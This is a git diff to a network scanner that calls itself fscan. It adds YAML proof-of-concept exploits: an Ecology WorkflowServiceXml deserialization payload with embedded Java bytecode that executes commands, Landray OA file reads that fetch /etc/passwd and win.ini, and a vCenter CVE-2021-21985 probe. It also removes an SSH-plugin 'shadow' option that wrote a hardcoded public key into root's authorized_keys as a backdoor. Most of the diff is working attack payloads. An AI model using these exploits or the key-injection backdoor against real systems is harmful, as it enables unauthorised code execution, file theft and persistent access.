diff --git a/Plugins/ssh.go b/Plugins/ssh.go
index bb7cf33..3913ad9 100644
--- a/Plugins/ssh.go
+++ b/Plugins/ssh.go
@@ -74,9 +74,6 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
flag = true
var result string
if info.Command != "" {
- if info.Command == "shadow" {
- info.Command = "mkdir dir /root/.ssh/ && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDkQQuWtmLm0eEhogGubMFh2/qv21aQV1tzbRjySPNQJRig479hMre48jxWDzB71WdEU2vg+ns8/0s3jqcGAx5lJaneH1ovLRNdIq4PkfmJPSMCEibGoNVS47rvfrv4QgECnbAt3azklnvniDvZiP5KjBQS9z57Ni2WVDC1SHNy1PDVMGYMJxZZ8kVKP7LRDbiOKJsSplHV/qP3NGZkdKh7OUYBx8A7+S3vT9c3AMSmk74Z2ibU0sddlngf0hLOxbTRiJV+OsgQQOfnttZvA7LoxbCiMtpzKGLOLAHXD8Hx5okXkx8cGOjc+Fcr6s2eQ10BLGPO4LPYWQ+G91xj+VF7 sysadmin\">> /root/.ssh/authorized_keys"
- }
combo, _ := session.CombinedOutput(info.Command)
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
if info.SshKey != "" {
diff --git a/WebScan/pocs/ecology-workflowservicexml-2.yml b/WebScan/pocs/ecology-workflowservicexml-2.yml
new file mode 100644
index 0000000..46d2ace
--- /dev/null
+++ b/WebScan/pocs/ecology-workflowservicexml-2.yml
@@ -0,0 +1,20 @@
+name: poc-yaml-ecology-workflowservicexml
+set:
+ rand1: randomInt(1000, 9999)
+ rand2: randomInt(1000, 9999)
+rules:
+ - method: POST
+ path: /services%20/WorkflowServiceXml
+ headers:
+ Content-Type: text/xml
+ cmd: bin/bash -c 'expr {{rand1}} + {{rand2}}'
+ follow_redirects: false
+ body: |
+ <java.util.PriorityQueue serialization="custom">
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class="org.apache.commons.beanutils.BeanComparator">
<property>outputProperties</property>
<comparator class="org.apache.commons.collections.comparators.ComparableComparator"/>
</comparator>
</default>
<int>3</int>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADQAjwoACgA/CQAiAEAKAEEAQgoAQQBDCABECgBFAEYIADUHAEcKAAgASAcASQoASgBLBwBMCAAuCgAMAE0KAAwATgcATwsAEABQBwBRCgBSAFMHAFQKABQAPwgAVQoAFABWCgAUAFcKAFIAWAoAWQBaCgASAFsIAFwKABIAXQoAEgBeCgBfAGAHAGEKACAAYgcAYwcAZAEABGpha3kBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAIkx5YW9zZXJpYWwvcGF5bG9hZHMvdXRpbC9UZXN0T2JqMTsBAAg8Y2xpbml0PgEAA2NtZAEAA3JlcAEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAANvdXQBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAJzaQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0Q29udGV4dFJlcXVlc3QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3JlcQEAL0xjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGw7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAGEBAApTb3VyY2VGaWxlAQANVGVzdE9iajEuamF2YQwAJgAnDAAkACUHAGUMAGYAZwwAaABpAQAsY29tLmNhdWNoby5zZXJ2ZXIuZGlzcGF0Y2guU2VydmxldEludm9jYXRpb24HAGoMAGsAbAEAD2phdmEvbGFuZy9DbGFzcwwAbQBuAQAQamF2YS9sYW5nL09iamVjdAcAbwwAcABxAQAtY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwU2VydmxldFJlcXVlc3RJbXBsDAByAHMMAHQAdQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAB2AHcBABFqYXZhL3V0aWwvU2Nhbm5lcgcAeAwAeQB6AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAdjbWQgL2MgDAB7AHwMAH0AfgwAfwCABwCBDACCAIMMACYAhAEAAlxBDACFAIYMAIcAfgcAiAwAiQCKAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAiwAnAQAgeWFvc2VyaWFsL3BheWxvYWRzL3V0aWwvVGVzdE9iajEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEmdldFNlcnZsZXRSZXNwb25zZQEAISgpTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA9wcmludFN0YWNrVHJhY2UBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwCMCgCNAD8AIQAiAI0AAQAjAAEACgAkACUAAAACAAEAJgAnAAEAKAAAAC8AAQABAAAABSq3AI6xAAAAAgApAAAABgABAAAABwAqAAAADAABAAAABQArACwAAAAIAC0AJwABACgAAAE5AAYABgAAAIMBswACuAADtgAEEgW2AAZLKhIHA70ACLYACUwrAQO9AAq2AAvAAAxNLBINtgAOxgBMLBINtgAOTiy2AA/AABA6BBkEuQARAQA6BRkFuwASWbgAE7sAFFm3ABUSFrYAFy22ABe2ABi2ABm2ABq3ABsSHLYAHbYAHrYAH6cACEsqtgAhsQABAAQAegB9ACAAAwApAAAAPgAPAAAACQAEAA0AEAAOABsADwAoABAAMQARADgAEgBBABMASgAUAHEAFQB3ABQAegAZAH0AFwB+ABgAggAaACoAAABIAAcAOABCAC4AJQADAEEAOQAvADAABABKADAAMQAyAAUAEABqADMANAAAABsAXwA1ADYAAQAoAFIANwA4AAIAfgAEADkAOgAAADsAAAAKAAP7AHpCBwA8BAABAD0AAAACAD4=</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
</java.util.PriorityQueue>
</java.util.PriorityQueue> 2
+ expression: |
+ response.body.bcontains(bytes(string(rand1 + rand2)))
+detail:
+ author: tangshoupu
+ info: ecology-workflowservicexml-rce
+ links:
+ - https://www.anquanke.com/post/id/239865
\ No newline at end of file
diff --git a/WebScan/pocs/ecology-workflowservicexml.yml b/WebScan/pocs/ecology-workflowservicexml.yml
new file mode 100644
index 0000000..1e0c50f
--- /dev/null
+++ b/WebScan/pocs/ecology-workflowservicexml.yml
@@ -0,0 +1,20 @@
+name: poc-yaml-ecology-workflowservicexml
+set:
+ rand1: randomInt(1000, 9999)
+ rand2: randomInt(1000, 9999)
+rules:
+ - method: POST
+ path: /services%20/WorkflowServiceXml
+ follow_redirects: false
+ headers:
+ Content-Type: text/xml
+ cmd: type c:\\windows\\win.ini
+ body: |
+ <java.util.PriorityQueue serialization="custom">
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class="org.apache.commons.beanutils.BeanComparator">
<property>outputProperties</property>
<comparator class="org.apache.commons.collections.comparators.ComparableComparator"/>
</comparator>
</default>
<int>3</int>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADQAjwoACgA/CQAiAEAKAEEAQgoAQQBDCABECgBFAEYIADUHAEcKAAgASAcASQoASgBLBwBMCAAuCgAMAE0KAAwATgcATwsAEABQBwBRCgBSAFMHAFQKABQAPwgAVQoAFABWCgAUAFcKAFIAWAoAWQBaCgASAFsIAFwKABIAXQoAEgBeCgBfAGAHAGEKACAAYgcAYwcAZAEABGpha3kBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAIkx5YW9zZXJpYWwvcGF5bG9hZHMvdXRpbC9UZXN0T2JqMTsBAAg8Y2xpbml0PgEAA2NtZAEAA3JlcAEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAANvdXQBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAJzaQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0Q29udGV4dFJlcXVlc3QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3JlcQEAL0xjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGw7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAGEBAApTb3VyY2VGaWxlAQANVGVzdE9iajEuamF2YQwAJgAnDAAkACUHAGUMAGYAZwwAaABpAQAsY29tLmNhdWNoby5zZXJ2ZXIuZGlzcGF0Y2guU2VydmxldEludm9jYXRpb24HAGoMAGsAbAEAD2phdmEvbGFuZy9DbGFzcwwAbQBuAQAQamF2YS9sYW5nL09iamVjdAcAbwwAcABxAQAtY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwU2VydmxldFJlcXVlc3RJbXBsDAByAHMMAHQAdQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAB2AHcBABFqYXZhL3V0aWwvU2Nhbm5lcgcAeAwAeQB6AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAdjbWQgL2MgDAB7AHwMAH0AfgwAfwCABwCBDACCAIMMACYAhAEAAlxBDACFAIYMAIcAfgcAiAwAiQCKAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAiwAnAQAgeWFvc2VyaWFsL3BheWxvYWRzL3V0aWwvVGVzdE9iajEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEmdldFNlcnZsZXRSZXNwb25zZQEAISgpTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA9wcmludFN0YWNrVHJhY2UBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwCMCgCNAD8AIQAiAI0AAQAjAAEACgAkACUAAAACAAEAJgAnAAEAKAAAAC8AAQABAAAABSq3AI6xAAAAAgApAAAABgABAAAABwAqAAAADAABAAAABQArACwAAAAIAC0AJwABACgAAAE5AAYABgAAAIMBswACuAADtgAEEgW2AAZLKhIHA70ACLYACUwrAQO9AAq2AAvAAAxNLBINtgAOxgBMLBINtgAOTiy2AA/AABA6BBkEuQARAQA6BRkFuwASWbgAE7sAFFm3ABUSFrYAFy22ABe2ABi2ABm2ABq3ABsSHLYAHbYAHrYAH6cACEsqtgAhsQABAAQAegB9ACAAAwApAAAAPgAPAAAACQAEAA0AEAAOABsADwAoABAAMQARADgAEgBBABMASgAUAHEAFQB3ABQAegAZAH0AFwB+ABgAggAaACoAAABIAAcAOABCAC4AJQADAEEAOQAvADAABABKADAAMQAyAAUAEABqADMANAAAABsAXwA1ADYAAQAoAFIANwA4AAIAfgAEADkAOgAAADsAAAAKAAP7AHpCBwA8BAABAD0AAAACAD4=</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
</java.util.PriorityQueue>
</java.util.PriorityQueue> 2
+ expression: |
+ response.status == 500 && response.headers["Set-Cookie"].contains("ecology") && response.body.bcontains(b"for 16-bit app support")
+detail:
+ author: tangshoupu
+ info: ecology-workflowservicexml-rce
+ links:
+ - https://www.anquanke.com/post/id/239865
\ No newline at end of file
diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml
new file mode 100644
index 0000000..f7d39e7
--- /dev/null
+++ b/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-landray-oa-custom-jsp-fileread
+rules:
+ - method: POST
+ path: /sys/ui/extend/varkind/custom.jsp
+ body: var={"body":{"file":"file:///c://windows/win.ini"}}
+ expression: |
+ response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+detail:
+ author: B1anda0(https://github.com/B1anda0)
+ links:
+ - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
\ No newline at end of file
diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread.yml
new file mode 100644
index 0000000..e513a88
--- /dev/null
+++ b/WebScan/pocs/landray-oa-custom-jsp-fileread.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-landray-oa-custom-jsp-fileread
+rules:
+ - method: POST
+ path: /sys/ui/extend/varkind/custom.jsp
+ body: var={"body":{"file":"file:///etc/passwd"}}
+ expression: |
+ response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+ author: B1anda0(https://github.com/B1anda0)
+ links:
+ - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
\ No newline at end of file
diff --git a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml b/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml
new file mode 100644
index 0000000..6d3b795
--- /dev/null
+++ b/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml
@@ -0,0 +1,17 @@
+name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
+rules:
+ - method: POST
+ path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
+ headers:
+ Content-Type: application/json
+ body: |-
+ {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
+ expression: |
+ response.status == 200 && response.body.bcontains(b"result")
+detail:
+ vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
+ author: envone77
+ description: "vmware vCenter unauth RCE cve-2021-21985"
+ links:
+ - https://www.anquanke.com/post/id/243098
+ - https://github.com/alt3kx/CVE-2021-21985_PoC
\ No newline at end of file
diff --git a/common/flag.go b/common/flag.go
index 03390a5..f3bdd39 100644
--- a/common/flag.go
+++ b/common/flag.go
@@ -11,7 +11,7 @@ func Banner() {
/ /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
- fscan version: 1.6.2
+ fscan version: 1.6.3
`
print(banner)
}